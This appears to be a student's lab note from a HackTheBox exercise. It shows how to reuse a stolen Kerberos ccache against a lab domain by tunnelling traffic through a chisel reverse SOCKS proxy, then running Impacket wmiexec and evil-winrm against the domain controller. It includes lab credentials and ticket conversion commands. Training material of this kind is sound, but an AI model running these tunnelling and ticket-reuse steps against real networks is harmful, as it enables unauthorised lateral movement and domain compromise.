Linux Attack Tools With Kerberos

Summary: In order to use Linux attack tools (Impacket and evil-winrm) to connect to the target machine, which runs Linux and uses Kerberos, from our attacking machine, we need to do a series of steps, including downloading chisel, modifying proxychains, and setting KRB5CCNAME environment variable.

Using Linux tools with Kerberos:

  • Set KRB5CCNAME to the correct ccache file if using a domain-joined machine.
  • If attacking from a non-domain machine, ensure it can reach the Domain Controller (KDC) and resolve domain names.

If the attack host does not connect to the KDC:

  1. Proxy traffic via a machine like MS01 using tools like Chisel and Proxychains.
  2. Edit /etc/hosts to hardcode IPs for the domain and target machines.

Tables of Contents

modify /etc/hosts

> cat /etc/hosts

# Host addresses inlanefreight.htb   inlanefreight   dc01.inlanefreight.htb  dc01  ms01.inlanefreight.htb  ms01

modify /etc/proxychains.conf

> cat /etc/proxychains.conf


socks5 1080

Download and Start Chisel Server

gzip -d chisel_1.7.7_linux_amd64.gz
mv chisel_* chisel && chmod +x ./chisel
sudo ./chisel server --reverse

this will start a server

2022/10/10 07:26:15 server: Reverse tunneling enabled
2022/10/10 07:26:15 server: Fingerprint 58EulHjQXAOsBRpxk232323sdLHd0r3r2nrdVYoYeVM=
2022/10/10 07:26:15 server: Listening on

Connect to Windows Machine and Execute Chisel

RDP to the machine MS01

xfreerdp /v: /u:david /d:inlanefreight.htb /p:Password2 /dynamic-resolution

Execute Chisel from the machine

C:\htb> c:\tools\chisel.exe client R:socks

2022/10/10 06:34:19 client: Connecting to ws://
2022/10/10 06:34:20 client: Connected (Latency 125.6177ms)

Setting the KRB5CCNAME Environment Variable

we need to transfer the ccache file from LINUX01 to our own machine, and set the KRB5CCNAME in our Attacking machine, as follows:

export KRB5CCNAME=/home/htb-student/krb5cc_647401106_I8I133

Using Impacket with proxychains and Kerberos Authentication

proxychains impacket-wmiexec dc01 -k

-k for kerberos
if we prompted for password, can use -no-pass flag

Note: If you are using Impacket tools from a Linux machine connected to the domain, note that some Linux Active Directory implementations use the FILE: prefix in the KRB5CCNAME variable. If this is the case, we need to modify the variable only to include the path to the ccache file.


in our attacking machine, install

sudo apt-get install krb5-user -y

While installing, we'll get a prompt for the Kerberos realm. Use the domain name: INLANEFREIGHT.HTB, and the KDC is the DC01.
Pasted image 20250101170628.png
While installing, we'll get a prompt for the Kerberos realm. Use the domain name: INLANEFREIGHT.HTB, and the KDC is the DC01.
Pasted image 20250101170649.png

In case krb5-user is already installed, we need to modify/etc/krb5.conf

> cat /etc/krb5.conf

        default_realm = INLANEFREIGHT.HTB


        kdc = dc01.inlanefreight.htb


Now we can use evil-winrm.

Using Evil-WinRM with Kerberos

proxychains evil-winrm -i dc01 -r inlanefreight.htb

use a ccache file in Windows or a kirbi file in Linux

Impacket Ticket Converter

> impacket-ticketConverter krb5cc_647401106_I8I133 julio.kirbi

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] converting ccache to kirbi...
[+] done